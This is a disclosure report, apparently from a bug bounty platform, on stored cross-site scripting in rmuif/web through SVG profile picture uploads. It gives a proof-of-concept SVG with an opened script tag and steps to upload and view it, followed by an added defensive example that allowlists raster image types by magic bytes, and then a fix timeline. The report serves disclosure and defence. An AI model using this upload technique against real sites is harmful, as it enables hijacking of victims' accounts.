Cross-site Scripting (XSS) - Stored in rmuif/web


Reported on Oct 20th 2021


rmuif is vulnerable to XSS. It is possible to use <script> tags in SVG content when uploading a profile picture.

Proof of Concept

SVG content:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "">

<svg version="1.1" baseProfile="full" xmlns="">
   <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
   <script type="text/javascript">

1: Save the above content into an SVG file.

2: Access the settings page and upload this file as a profile picture.

3: Access the target file URL.

PoC video.


This vulnerability is capable of executing arbitrary JS code to perform actions which may compromise the victim's account.
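
An added example, not taken from the rmuif/web fix or from the original report: one way to close this class of upload is to accept a profile picture only when its leading bytes match an allowlisted raster format, so SVG (an XML document that can carry script) is rejected whatever its file name or declared type. The function names and sample inputs below are assumptions made for illustration.

```javascript
// Added example (not rmuif code): gate avatar uploads on file content.
// Raster formats are allowlisted by magic bytes; SVG is XML text and never matches.
const RASTER_SIGNATURES = [
  { type: "image/png", offset: 0, bytes: [0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a] },
  { type: "image/jpeg", offset: 0, bytes: [0xff, 0xd8, 0xff] },
  { type: "image/gif", offset: 0, bytes: [0x47, 0x49, 0x46, 0x38] }, // "GIF8"
];

function matchesAt(buf, offset, bytes) {
  if (buf.length < offset + bytes.length) return false;
  return bytes.every((b, i) => buf[offset + i] === b);
}

// Returns the raster MIME type proven by the leading bytes, or null.
function sniffRasterType(buf) {
  for (const sig of RASTER_SIGNATURES) {
    if (matchesAt(buf, sig.offset, sig.bytes)) return sig.type;
  }
  // WebP container: "RIFF" + 4-byte length + "WEBP"
  const riff = matchesAt(buf, 0, [0x52, 0x49, 0x46, 0x46]);
  if (riff && matchesAt(buf, 8, [0x57, 0x45, 0x42, 0x50])) return "image/webp";
  return null;
}

// declaredType is whatever the client sent (File.type, Content-Type); it is
// compared against the content, never trusted on its own.
function checkAvatarUpload(buf, declaredType) {
  const sniffed = sniffRasterType(buf);
  if (sniffed === null) {
    return { ok: false, reason: "content is not an allowlisted raster image" };
  }
  if (declaredType !== sniffed) {
    return { ok: false, reason: `declared ${declaredType}, content is ${sniffed}` };
  }
  return { ok: true, contentType: sniffed };
}

// Constructed sample inputs: a script-free SVG and a bare PNG signature.
const SAMPLE_SVG = new TextEncoder().encode(
  '<?xml version="1.0"?><svg version="1.1"><rect width="300" height="100"/></svg>'
);
const SAMPLE_PNG = new Uint8Array([0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a, 0, 0, 0, 13]);

console.log(checkAvatarUpload(SAMPLE_SVG, "image/svg+xml")); // rejected
console.log(checkAvatarUpload(SAMPLE_SVG, "image/png"));     // rejected: renamed SVG
console.log(checkAvatarUpload(SAMPLE_PNG, "image/png"));     // accepted
```

Run the check at the point where the upload is enforced rather than only in the browser, and store the file under the sniffed contentType instead of the client-supplied one.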


We have contacted a member of the rmuif/web team and are waiting to hear back (2 years ago)
rmuif/web maintainer validated this vulnerability (2 years ago)
Renan Rocha has been awarded the disclosure bounty
The fix bounty is now up for grabs
rmuif/web maintainer marked this as fixed with commit daa247 (2 years ago)
The fix bounty has been dropped
This vulnerability will not receive a CVE
AccountTab.js#L141-L186 has been validated